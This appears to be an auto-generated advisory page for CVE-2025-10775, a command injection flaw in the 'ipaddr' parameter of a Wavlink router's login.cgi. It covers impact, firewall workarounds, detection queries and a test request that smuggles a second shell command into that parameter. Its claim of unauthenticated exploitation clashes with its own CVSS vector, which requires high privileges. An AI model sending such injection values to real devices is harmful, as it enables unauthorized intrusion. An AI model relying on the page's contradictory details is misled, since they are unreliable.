CVE-2025-10775 – This CVE describes an OS command injection vuln... (How to Fix)

Q: What is the severity of CVE-2025-10775?

CVE-2025-10775 has a CVSS score of 4.7 (MEDIUM). This CVE describes an OS command injection vulnerability in Wavlink WL-NU516U1 routers that allows remote attackers to execute arbitrary commands on affected devices. Attackers can exploit this by manipulating the 'ipaddr' parameter in the login.cgi endpoint. All users of the affected router model with the vulnerable firmware are at risk.

📋 TL;DR

This CVE describes an OS command injection vulnerability in Wavlink WL-NU516U1 routers that allows remote attackers to execute arbitrary commands on affected devices. Attackers can exploit this by manipulating the 'ipaddr' parameter in the login.cgi endpoint. All users of the affected router model with the vulnerable firmware are at risk.

💻 Affected Systems

Products:

Wavlink WL-NU516U1

Versions: Firmware version 240425

Operating Systems: Embedded Linux/RTOS

Default Config Vulnerable: ⚠️ Yes

Notes: All devices running the vulnerable firmware version are affected. The vulnerability is in the web interface CGI component.

📦 What is this software?

Wl Nu516u1 Firmware by Wavlink

View all CVEs affecting Wl Nu516u1 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attacker to install persistent backdoors, pivot to internal networks, or use device for botnet activities.

🟠

Likely Case

Unauthorized command execution leading to device configuration changes, credential theft, or denial of service.

🟢

If Mitigated

Limited impact if network segmentation prevents router access from untrusted networks.

🌐 Internet-Facing: HIGH - Attack can be launched remotely without authentication.

🏢 Internal Only: MEDIUM - Internal attackers could exploit if they have network access to the device.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: UNKNOWN

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploit code is publicly available on GitHub. Attack requires network access to the router's web interface.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Vendor has not responded to disclosure. Consider replacing device or implementing workarounds.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate the router from untrusted networks and restrict access to management interface.

iptables -A INPUT -p tcp --dport 80 -s trusted_network -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Disable Web Interface

linux

Disable the vulnerable CGI endpoint if not required for operation.

chmod 000 /cgi-bin/login.cgi
rm /cgi-bin/login.cgi

🧯 If You Can't Patch

Replace affected device with a different model that receives security updates
Implement strict network access controls to limit who can reach the router's management interface

🔍 How to Verify

Check if Vulnerable:

Check firmware version via web interface at http://router-ip/status.cgi or SSH if enabled. Look for version 240425.

Check Version:

curl -s http://router-ip/status.cgi | grep -i version

Verify Fix Applied:

Test the vulnerable endpoint with safe payloads: curl 'http://router-ip/cgi-bin/login.cgi?ipaddr=127.0.0.1;echo test'

📡 Detection & Monitoring

Log Indicators:

Unusual commands in system logs
Multiple failed login attempts followed by command execution patterns

Network Indicators:

HTTP requests to /cgi-bin/login.cgi with shell metacharacters in parameters
Outbound connections from router to unexpected destinations

SIEM Query:

source="router_logs" AND (uri="/cgi-bin/login.cgi" AND query CONTAINS ";" OR "|" OR "`")

📊 Metadata

CVE ID: CVE-2025-10775

CVSS v3 Score: 4.7 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-77

EPSS Score: 0.28% exploit probability (50.8th percentile)

Published: September 22, 2025

Last Updated: October 7, 2025

🔗 References

https://github.com/swwer7000/iot Exploit,Third Party Advisory
https://vuldb.com/?ctiid.325131 Permissions Required,VDB Entry
https://vuldb.com/?id.325131 Third Party Advisory,VDB Entry
https://vuldb.com/?submit.650641 Third Party Advisory,VDB Entry
https://github.com/swwer7000/iot Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-10775, you might also want to check these: